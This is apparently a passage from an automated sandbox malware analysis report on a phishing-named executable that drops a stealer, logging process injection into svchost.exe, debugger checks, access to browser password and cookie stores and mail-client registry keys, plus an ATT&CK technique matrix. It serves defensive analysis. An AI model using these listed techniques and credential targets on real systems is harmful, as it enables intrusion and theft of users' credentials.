              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_00418981 memset,GetSystemInfo,11_2_00418981
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000005.00000002.178268031071.000000000430B000.00000004.00000020.00020000.00000000.sdmp, INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000005.00000002.178268031071.0000000004337000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000005.00000002.178268031071.0000000004337000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWG
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeAPI call chain: ExitProcess graph end nodegraph_3-4318
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeAPI call chain: ExitProcess graph end nodegraph_3-4494
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end nodegraph_10-2855
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information queried: ProcessInformation
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 7_2_351E60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_351E60E2
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_6E131A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,3_2_6E131A98
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 7_2_351E4AB4 mov eax, dword ptr fs:[00000030h]7_2_351E4AB4
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 7_2_351E724E GetProcessHeap,7_2_351E724E
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess token adjusted: Debug
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 7_2_351E60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_351E60E2
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 7_2_351E2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_351E2B1C
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 7_2_351E2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_351E2639

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\ProgramData\Vexplo\Vexploio.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\ProgramData\Vexplo\Vexploio.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\ProgramData\Vexplo\Vexploio.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2ED9008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 673008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2B53008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3089008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 225008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F0E008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2B02008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2DF3008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EBC008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C1008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3193008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2AD2008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2E4C008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2B8C008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 31A3008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 31C1008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2A38008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 660008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2E93008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C1F008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2FA5008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2AC3008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 36B008Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2CDF008Jump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess created: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe "C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe"Jump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess created: C:\ProgramData\Vexplo\Vexploio.exe "C:\ProgramData\Vexplo\Vexploio.exe" Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\ProgramData\Vexplo\Vexploio.exe "C:\ProgramData\Vexplo\Vexploio.exe" Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\ProgramData\Vexplo\Vexploio.exe C:\ProgramData\Vexplo\Vexploio.exe /stext "C:\Users\user\AppData\Local\Temp\natcvvveorcxxyqjtvtsuftguqn"Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\ProgramData\Vexplo\Vexploio.exe C:\ProgramData\Vexplo\Vexploio.exe /stext "C:\Users\user\AppData\Local\Temp\ycymwnogcaukzemncgolxsopvfffsfc"Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\ProgramData\Vexplo\Vexploio.exe C:\ProgramData\Vexplo\Vexploio.exe /stext "C:\Users\user\AppData\Local\Temp\ixefxgzzpimpkkartranixjgdmpglqsibv"Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 7_2_351E2933 cpuid 7_2_351E2933
              Source: C:\ProgramData\Vexplo\Vexploio.exeQueries volume information: C:\ VolumeInformation
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 7_2_351E2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_351E2264
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_0040320C
              Source: C:\ProgramData\Vexplo\Vexploio.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 7.2.Vexploio.exe.43a3d40.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.183085374541.000000000438B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.178268031071.0000000004322000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.183085374541.0000000004397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: INQUIRY#46789-MAY_24_PRODUCTS.exe PID: 7960, type: MEMORYSTR
              Source: C:\ProgramData\Vexplo\Vexploio.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
              Source: C:\ProgramData\Vexplo\Vexploio.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
              Source: C:\ProgramData\Vexplo\Vexploio.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\ProgramData\Vexplo\Vexploio.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\ProgramData\Vexplo\Vexploio.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\ProgramData\Vexplo\Vexploio.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\ProgramData\Vexplo\Vexploio.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\ProgramData\Vexplo\Vexploio.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\ProgramData\Vexplo\Vexploio.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\ProgramData\Vexplo\Vexploio.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\ProgramData\Vexplo\Vexploio.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
              Source: C:\ProgramData\Vexplo\Vexploio.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\ProgramData\Vexplo\Vexploio.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\ProgramData\Vexplo\Vexploio.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\ProgramData\Vexplo\Vexploio.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

              Remote Access Functionality

              barindex
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-RXKA3PJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-RXKA3PJump to behavior
              Source: Yara matchFile source: 7.2.Vexploio.exe.43a3d40.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.183085374541.000000000438B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.178268031071.0000000004322000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.183085374541.0000000004397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: INQUIRY#46789-MAY_24_PRODUCTS.exe PID: 7960, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Shared Modules
              211
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              1
              Credentials in Registry
              4
              File and Directory Discovery
              Remote Desktop Protocol1
              Data from Local System
              2
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
              Process Injection
              1
              Software Packing
              1
              Credentials In Files
              28
              System Information Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook211
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              NTDS131
              Security Software Discovery
              Distributed Component Object Model2
              Clipboard Data
              1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets1
              Virtualization/Sandbox Evasion
              SSHKeylogging2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Virtualization/Sandbox Evasion
              Cached Domain Credentials3
              Process Discovery
              VNCGUI Input Capture12
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
              Process Injection
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
